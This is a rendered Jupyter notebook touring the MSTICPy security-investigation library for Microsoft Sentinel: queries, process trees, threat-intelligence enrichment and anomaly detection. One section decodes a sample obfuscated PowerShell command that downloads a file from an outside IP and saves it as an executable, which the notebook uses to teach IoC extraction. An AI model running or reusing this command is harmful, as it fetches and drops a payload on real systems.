Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
Azure
GitHub Repository: Azure/Azure-Sentinel-Notebooks
Path: blob/master/tutorials-and-examples/example-notebooks/MSTICPy Tour.ipynb
3253 views
Kernel: Python (condadev)

MSTICPy v1.0.0 Overview

This notebook is used to demonstrate some of the functionality of MSTICPy. New functionality is being added all the time (and old functionality improved - or, at least, that is the plan) so be sure to check the latest documentation on MSTICPy Readthedocs

Pre-requisites

Data

The first part of the notebook uses live data so must be run using a live Microsoft Sentinel subscription. The latter half uses captive data so can be run without Microsoft Sentinel.

Threat Intelligence and Geo-location provider subscriptions

This notebook uses examples that assume that you have an account with one or more of:

  • VirusTotal

  • AlienVault OTX

  • IBM XForce

  • Maxmind GeoLite

These providers all have free account tiers.

You can also use Microsoft Sentinel TI as a threat intelligence provider but it is a good idea to have more than one provider available.

For more information on setting up accounts and configuring TI and GeoIP providers see the following instructions:

You may also want to use the MPConfigEdit tool to manage these settings.

Load and initialize MSTICPy and the Notebook environment

from pathlib import Path from IPython.display import display, HTML REQ_PYTHON_VER = "3.10" REQ_MSTICPY_VER = "2.12.0" display(HTML("<h3>Starting Notebook setup...</h3>")) from msticpy.nbtools import nbinit nbinit.init_notebook( namespace=globals(), # extra_imports=["my_module, class", "my_module.sub, func, alias"], # additional_packages=["pytest", "plotly"], );

Configuration

You may get warnings about missing configuration from init_notebook. MSTICPy uses a lot of external services (in addition to Microsoft Sentinel) - e.g. threat intelligence and IP geo-location providers. Each service typically needs an account (that you need to create) and MSTICPy needs to be able to access that account information in order to use the service. To do that we store this data in a central configuration file - msticpyconfig.yaml.

To learn more about setting this up see these two notebooks:

MSTICPy imports

The init_notebook function imports a number of MSTICPy components and some other common modules such as pandas and numpy.

We can see things that have been imported.

print([obj for obj in dir() if not obj.startswith("_")])
['FoliumMap', 'GeoLiteLookup', 'HTML', 'IPStackLookup', 'In', 'IoCExtract', 'Markdown', 'MatplotlibDeprecationWarning', 'Observations', 'Out', 'Path', 'Pivot', 'QueryProvider', 'REQ_MSTICPY_VER', 'REQ_PYTHON_VER', 'SecurityAlert', 'SecurityEvent', 'TILookup', 'VERSION', 'VTLookup', 'WIDGET_DEFAULTS', 'WorkspaceConfig', 'add_related_alerts', 'base64', 'base64unpack', 'create_alert_graph', 'display', 'domain_utils', 'entities', 'exit', 'foliummap', 'geo_distance', 'geoip', 'get_ipython', 'iocextract', 'md', 'md_warn', 'nbdisplay', 'nbinit', 'nbwidgets', 'np', 'observationlist', 'pd', 'plt', 'process_tree', 'process_tree_utils', 'ptree', 'quit', 'sectools_magics', 'security_alert', 'security_alert_graph', 'security_base', 'security_event', 'sns', 'ti_browser', 'tilookup', 'timeline', 'tiproviders', 'user_config', 'utils', 'vtlookup', 'widgets']

Data Queries

Data queries are the foundation of any analysis or investigation. If you can't query data you have nothing to analyze.

First we need to load and authenticated to the data provider. The example shown is for Microsoft Sentinel but other data providers are supported such as:

  • Microsoft Defender

  • Splunk

  • Microsoft Graph

# See if we have a Microsoft Sentinel Workspace defined in our config file. # If not, let the user specify Workspace and Tenant IDs ws_config = WorkspaceConfig("CyberSecuritySoc") if not ws_config.config_loaded: ws_config.prompt_for_ws() print("Workspace Config:", ws_config) qry_prov = QueryProvider(data_environment="AzureSentinel") print("done")
Workspace Config: {'workspace_id': '8ecf8077-cf51-4820-aadd-14040956f35d', 'tenant_id': '72f988bf-86f1-41af-91ab-2d7cd011db47'} done
qry_prov.connect(ws_config)
<IPython.core.display.Javascript object>
<IPython.core.display.Javascript object>

What queries are available

You can choose from a set of predefined queries (this list is usually up-to-date but the code itself is the real authority since we add new queries frequently)

The easiest way to see the available queries is with the query browser. This also lets you view usage/parameter information for each query.

qry_prov.browse_queries()
VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle(description_width='initial')), Sel…

Command-line alternative

Command-line enthusiasts can use:

qry_prov.list_queries()
['Azure.get_vmcomputer_for_host', 'Azure.get_vmcomputer_for_ip', 'Azure.list_aad_signins_for_account', 'Azure.list_aad_signins_for_ip', 'Azure.list_all_signins_geo', 'Azure.list_azure_activity_for_account', 'Azure.list_azure_activity_for_ip', 'Azure.list_azure_activity_for_resource', 'Azure.list_storage_ops_for_hash', 'Azure.list_storage_ops_for_ip', 'AzureNetwork.az_net_analytics', ...

Or Jupyter/IPython tab-completion. You can use a trailing "?" to see the syntax and required parameters of the query

qry_prov.Azure.list_azure_activity_for_account?
Lists Azure Activity for Account Parameters ---------- account_name: str The account name to find add_query_items: str (optional) Additional query clauses end: datetime (optional) ...

Viewing help for a query function from the command line.

qry_prov.Azure.list_azure_activity_for_account?
Signature: qry_prov.Azure.list_azure_activity_for_account(*args, **kwargs) -> Union[pandas.core.frame.DataFrame, Any] Call signature: qry_prov.Azure.list_azure_activity_for_account(*args, **kwargs) Type: partial String form: functools.partial(<bound method QueryProvider._execute_query of <msticpy.data.data_providers.Quer <...> object at 0x0000021CB07EA348>>, query_path='Azure', query_name='list_azure_activity_for_account') File: c:\users\ian\anaconda3\envs\condadev\lib\functools.py Docstring: Lists Azure Activity for Account Parameters ---------- account_name: str The account name to find add_query_items: str (optional) Additional query clauses end: datetime (optional) Query end time start: datetime (optional) Query start time (default value is: -5) table: str (optional) Table name (default value is: AzureActivity) Class docstring: partial(func, *args, **keywords) - new function with partial application of the given arguments and keywords.

Timespans

Nearly all queries need a time range parameter. You can specify this as a parameter to the query function but you can also the QueryTime widget to set your desired time range and just pass it to the query.

timespan = nbwidgets.QueryTime(units="day", auto_display=True)
VBox(children=(HTML(value='<h4>Set query time boundaries</h4>'), HBox(children=(DatePicker(value=datetime.date…
result_df = qry_prov.WindowsSecurity.list_host_processes(timespan, host_name="VictimPC") print("Result type:", type(result_df)) result_df.head(3)
<IPython.core.display.Javascript object>
Result type: <class 'pandas.core.frame.DataFrame'>

Extend an existing query

qry_prov.WindowsSecurity.list_host_processes( timespan, host_name="VictimPC", add_query_items="| summarize count() by NewProcessName | limit 10" )

Write your own query

qry_prov.exec_query("SecurityEvent | take 1000 | summarize count() by Computer, EventID | take 5")
<IPython.core.display.Javascript object>

Visualize the data in a timeline

Note: if you are running this notebook without a Microsoft Sentinel subscription (or other log data source that you can load into a pandas DataFrame) you can do the following to run the the first two visualizations in the this section:

  • Run the cell "Retrieve sample data files" (towards the end of the notebook)

  • run the following Python code

result_df = qry_prov_loc.WindowsSecurity.list_host_processes()

Event Timelines

result_df.mp_timeline.plot(source_columns=["Account", "NewProcessName", "CommandLine"], group_by="Account")
MIME type unknown not supported
MIME type unknown not supported

Process Trees

( result_df .query("Account != 'CONTOSO\VICTIMPC$' ") .mp_process_tree .plot(legend_col="Account", show_table=True) )
HBox(children=(IntProgress(value=0, bar_style='info', description='Progress:'), Label(value='0%')))
MIME type unknown not supported
MIME type unknown not supported
(Figure(id='10888', ...), Column(id='11016', ...))

Viewing Alerts

alert_list = qry_prov.SecurityAlert.list_alerts(timespan) alert_list.mp_timeline.plot(source_columns=["AlertName","ExtendedProperties"], group_by="Severity", height=200) alert_select = nbwidgets.SelectAlert(alerts=alert_list, action=nbdisplay.format_alert, auto_display=True)
<IPython.core.display.Javascript object>
MIME type unknown not supported
MIME type unknown not supported
VBox(children=(Text(value='', description='Filter alerts by title:', style=DescriptionStyle(description_width=…
nbdisplay.plot_entity_graph( security_alert_graph.create_alert_graph(SecurityAlert(alert_select.selected_alert)) )
MIME type unknown not supported
MIME type unknown not supported

Enrichment with Threat Intelligence, WhoIs and GeoIP

We're going to use Pivot functions here to allow us to focus on IP-specific operations

from msticpy.datamodel.pivot import Pivot IpAddress = entities.IpAddress pivot = Pivot(namespace=globals()) # Example of an IpAddress Pivot function IpAddress.util.whois("23.102.129.200")
Using Open PageRank. See https://www.domcop.com/openpagerank/what-is-openpagerank

Side note - discovering pivot functions

If what you want to do is entity related, there is a good chance that the MSTICPy function will appear as an entity pivot function.

What is an Entity?

An entity is essentially a "noun" in the CyberSec world - e.g. IP Address, host, URL. They are typically things that do things or have things done to them. Entities will always have one or more properties that identify the entity or provide additional context information. For example, an IpAddress entity has its primary Address property and it might also have contextual properties like geo-location or ASN data.

Pivot functions are verbs that performs investigative actions (like data queries) on the entity and return a result. Host, for example, has data queries that retrieve process or logon events logged for that host. IpAddress has functions to lookup its geolocation or query information about the address from Threat intelligence providers.

The easiest way to view the entities, their pivot functions and help associated with each function is to use the Pivot browser.

pivot.browse()
VBox(children=(HBox(children=(VBox(children=(HTML(value='<b>Entities</b>'), Select(description='entity', layou…

Build a pipeline to do everything at once

Note: we join the results of each step to the previous. We also add a call to mp_pivot.display() to show intermediate results

IpAddress = entities.IpAddress enriched_ip_df = ( pd.DataFrame(alert_select.selected_alert.Entities) .mp_pivot.run(IpAddress.util.whois, column="Address", join="inner") .dropna(axis=1) .mp_pivot.run(IpAddress.util.geoloc, column="Address", join="left") .mp_pivot.display(title="GeoIP and Whois", cols=["Address", "asn_description", "City", "State", "CountryCode"]) .mp_pivot.run(IpAddress.ti.lookup_ip, column="Address", join="left") )

Display the TI Results in a browsable format

TILookup.browse_results(enriched_ip_df)
VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle(description_width='initial')), Sel…

Investigating Obfuscated commands

powershell.exe -nop -w hidden -encodedcommand SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cDovLzM4Ljc1LjEzNy45OjkwODgvc3RhdGljL2VuY3J5cHQubWluLmpzIiAtT3V0RmlsZSAiYzpccHduZXIuZXhlIg==
encoded_cmd = ''' powershell.exe -nop -w hidden -encodedcommand SW52b2tlLVdlYlJlc XVlc3QgLVVyaSAiaHR0cDovLzM4Ljc1LjEzNy45OjkwODgvc3RhdGljL2VuY3J5cHQubWluLmpzIiAtT3V0RmlsZSAiYzpccHduZXIuZXhlIg== ''' print(f"Encoded string: {encoded_cmd}") dec_string, dec_df = base64unpack.unpack_items(input_string=encoded_cmd) print("Decoded string:", dec_string) # Extract any IoCs that we can check in TI providers iocs = IoCExtract().extract_df(data=dec_df, columns="decoded_string") md("IoCs Found", "bold, large") display(iocs) # Lookup and display TI results ti_results = ti_lookup.lookup_iocs(data=iocs, obs_col="Observable") ti_lookup.browse_results(ti_results)
Encoded string: powershell.exe -nop -w hidden -encodedcommand SW52b2tlLVdlYlJlc XVlc3QgLVVyaSAiaHR0cDovLzM4Ljc1LjEzNy45OjkwODgvc3RhdGljL2VuY3J5cHQubWluLmpzIiAtT3V0RmlsZSAiYzpccHduZXIuZXhlIg== Decoded string: powershell.exe -nop -w hidden -encodedcommand <decoded type='string' name='[None]' index='1' depth='1'>Invoke-WebRequest -Uri "http://38.75.137.9:9088/static/encrypt.min.js" -OutFile "c:\pwner.exe"</decoded> AA
VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle(description_width='initial')), Sel…

Plot GeoLocation of our bad IP address(es)

geo_locations = ( # Use pivot function to lookup location IpAddress.util.geoloc(iocs.query("IoCType == 'ipv4'").drop_duplicates(), column="Observable") # Convert the location data to GeoLocation entities .apply(entities.GeoLocation, axis=1) ) # Create a map geo_map = FoliumMap(zoom_start=10, height="75%", width="75%") geo_map.add_geoloc_cluster(geo_locations, color='red') geo_map.center_map() # Display the map utils.md("Geolocations for IP addresses", "large, bold") utils.md("Click on a marker for more information") display(geo_map.folium_map)

Using advanced analysis (AKA simple machine learning)

Retrieve sample data files

from urllib.request import urlretrieve from pathlib import Path from tqdm.auto import tqdm github_uri = "https://raw.githubusercontent.com/Azure/Azure-Sentinel-Notebooks/master/{file_name}" github_files = { "exchange_admin.pkl": "src/data", "processes_on_host.pkl": "src/data", "timeseries.pkl": "src/data", "data_queries.yaml": "src/data", } Path("data").mkdir(exist_ok=True) for file, path in tqdm(github_files.items(), desc="File download"): file_path = Path(path).joinpath(file) print(file_path, end=", ") url_path = f"{path}/{file}" if path else file urlretrieve( github_uri.format(file_name=url_path), file_path ) assert Path(file_path).is_file() qry_prov_loc = QueryProvider("LocalData", data_paths=["./data"], query_paths=["./data"]) qry_prov_loc.connect()
File download: 0%| | 0/4 [00:00<?, ?it/s]
data\exchange_admin.pkl, data\processes_on_host.pkl, data\timeseries.pkl, data\data_queries.yaml, Connected.

Time Series Decomposition - Anomaly detection

ob_bytes_per_hour = qry_prov_loc.Network.get_network_summary(timespan) md("Sample data:", "large") ob_bytes_per_hour.head(3)
from msticpy.nbtools.timeseries import display_timeseries_anomolies from msticpy.analysis.timeseries import timeseries_anomalies_stl # Conduct our timeseries analysis ts_analysis = timeseries_anomalies_stl(ob_bytes_per_hour) # Visualize the timeseries and any anomalies display_timeseries_anomolies(data=ts_analysis, y= 'TotalBytesSent'); md("We can see two clearly anomalous data points representing unusual outbound traffic.<hr>", "bold")
MIME type unknown not supported
MIME type unknown not supported

Detecting anomalous sequences using Markov Chain

The anomalous_sequence MSTICPy package uses Markov Chain analysis to predict the probability
that a particular sequence of events will occur given what has happened in the past.

Here we're applying it to Office activity.

Query the data

query = """ | where TimeGenerated >= ago(60d) | where RecordType_s == 'ExchangeAdmin' | where UserId_s !startswith "NT AUTHORITY" | where UserId_s !contains "prod.outlook.com" | extend params = todynamic(strcat('{"', Operation_s, '" : ', tostring(Parameters_s), '}')) | extend UserId = UserId_s, ClientIP = ClientIP_s, Operation = Operation_s | project TimeGenerated= Start_Time_t, UserId, ClientIP, Operation, params | sort by UserId asc, ClientIP asc, TimeGenerated asc | extend begin = row_window_session(TimeGenerated, 20m, 2m, UserId != prev(UserId) or ClientIP != prev(ClientIP)) | summarize cmds=makelist(Operation), end=max(TimeGenerated), nCmds=count(), nDistinctCmds=dcount(Operation), params=makelist(params) by UserId, ClientIP, begin | project UserId, ClientIP, nCmds, nDistinctCmds, begin, end, duration=end-begin, cmds, params """ exchange_df = qry_prov_loc.Azure.OfficeActivity(add_query_items=query) print(f"Number of events {len(exchange_df)}") exchange_df.drop(columns="params").head()
Number of events 146

Perform Anomalous Sequence analysis on the data

The analysis groups events into sessions (time-bounded and linked by a common account). It then
builds a probability model for the types of command (E.g. "SetMailboxProperty")
and the parameters and parameter values used for that command.

I.e. how likely is it that a given user would be running this sequence of commands in a logon session?

Using this probability model, we can highlight sequences that have an extremely low probability, based
on prior behavior.

from msticpy.analysis.anomalous_sequence.utils.data_structures import Cmd from msticpy.analysis.anomalous_sequence import anomalous # Support function to extract parameter values to a list of Cmd objects def process_exchange_session(session_with_params): new_ses = [] for cmd in session_with_params: cmd_name, params = next(iter(cmd.items())) new_ses.append(Cmd(name=cmd_name, params={param["Name"]: param["Value"] for param in params})) return new_ses # apply this function to create the param_value_session column exchange_df['param_value_session'] = exchange_df.apply( lambda x: process_exchange_session(session_with_params=x.params), axis=1 ) # create the anomaly model modelled_df = anomalous.score_sessions( data=exchange_df, session_column='param_value_session', window_length=3 ) # Invert the likelihood to create rarity score and take the log to normalize the plot modelled_df["rarity"] = np.log(1 / modelled_df.rarest_window3_likelihood) md("Session rarity - higher score is more unusual", "large, bold") anomalous.visualise_scored_sessions( data_with_scores=modelled_df, time_column='begin', # this will appear on the x-axis score_column='rarity', # this will appear on the y axis window_column='rarest_window3', # this will represent the session in the tool-tips source_columns=['UserId', 'ClientIP'], # specify any additional columns to appear in the tool-tips )
MIME type unknown not supported
MIME type unknown not supported
import pprint rarity_max=modelled_df["rarity"].max() rarity_min=modelled_df["rarity"].min() slider_step = rarity_max / 20 start_val = rarity_max - slider_step threshold = widgets.FloatSlider( description="Select rarity threshold", max=rarity_max + slider_step, min=0, value=start_val, step=slider_step, layout=widgets.Layout(width="60%"), style={"description_width": "200px"}, # readout_format=".7f" ) disp_cols = [ "UserId", "ClientIP", "begin", "end", "param_value_session", "rarity" ] def show_details(disp_df): html = [] for idx, (_, rarest_event) in enumerate(disp_df.iterrows(), 1): html.append(f"<h3>Event {idx} - Rarity: {rarest_event.rarity:.3f}</h3>") html.append("<hr>") html.append("Param session details:<br>") for cmd in rarest_event.param_value_session: html.append(f"Command: {cmd.name}<br>") html.append(pprint.pformat(cmd.params)) html.append("<br>") html.append("<hr><br>") output = "".join(html) if html else "No items selected" return HTML(output) def show_rows(change): thresh = change["new"] disp_df = modelled_df[modelled_df["rarity"] > thresh][disp_cols].sort_values("rarity", ascending=False) pd_disp.update(disp_df) det_disp.update(show_details(disp_df)) threshold.observe(show_rows, names="value") md("Move the slider to see event sessions abode the selected <i>rarity</i> threshold", "bold") display(HTML("<hr>")) display(threshold) display(HTML("<hr>")) md(f"Range is {rarity_min:.3f} (min rarity) to {rarity_max:.3f} (max rarity)<br><br><hr>") disp_df = modelled_df[modelled_df["rarity"] > start_val][disp_cols].sort_values("rarity", ascending=False) pd_disp = display(disp_df, display_id=True) det_disp = display(show_details(disp_df), display_id=True)
FloatSlider(value=12.238664471753138, description='Select rarity threshold', layout=Layout(width='60%'), max=1…
rarest_events = ( modelled_df[modelled_df["rarity"] > threshold.value] [[ "UserId", "ClientIP", "begin", "end", "param_value_session", "rarest_window3_likelihood" ]] .rename(columns={"rarest_window3_likelihood": "likelihood"}) .sort_values("likelihood") ) for idx, (_, rarest_event) in enumerate(rarest_events.iterrows(), 1): md(f"Event {idx}", "large") display(pd.DataFrame(rarest_event[["UserId", "ClientIP", "begin", "end", "likelihood"]])) md("<hr>") md("Param session details:", "bold") for cmd in rarest_event.param_value_session: md(f"Command: {cmd.name}") md(pprint.pformat(cmd.params)) md("<hr><br>")